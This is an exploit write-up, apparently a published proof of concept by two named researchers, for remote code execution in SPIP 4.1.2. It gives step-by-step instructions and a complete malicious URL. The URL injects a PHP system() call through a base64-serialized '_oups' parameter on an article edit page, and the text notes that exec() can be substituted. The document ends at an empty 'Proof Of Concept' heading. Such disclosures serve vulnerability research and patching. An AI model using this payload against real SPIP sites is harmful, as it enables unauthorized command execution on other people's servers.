# Remote Code Execution on SPIP 4.1.2 #### By Abyss Watcher & SpawnZii ## Local environment - spip 4.1.2 (20/05/2022) : https://files.spip.net/spip/archives/spip-v4.1.2.zip - PHP 8.0.0 - MySQL 5.6 Parano mode enabled, default configuration. ## Requirements - A user account with author role. - An article to edit. ## Vulnerable code https://github.com/spip/SPIP/blob/master/prive/formulaires/editer_liens.php#L133 : `_oups` GET parameter, on `edit_article` pages. ## Exploitation - Login at **`http://your_host/spip.php?page=login`**. - If you do not have an article created, you will have to create one at **`http://your_host/ecrire/?exec=article_edit&new=oui`**. Note your article id. - On the following url, change the parameter **id_article** by the id of the article you just created. **`http://your_host/ecrire/?exec=article&id_article=ID_OF_YOUR_ARTICLE&_oups=TzoxOiJBIjoxOntzOjE6ImEiO3M6MzoiUG9DIjt9'"><?php system('id;hostname;whoami');?>`** - Note : You can also change the php function by another, like `phpinfo()`,`exec()` ... - You can now hit enter and see the result of the command in the response. ## Proof Of Concept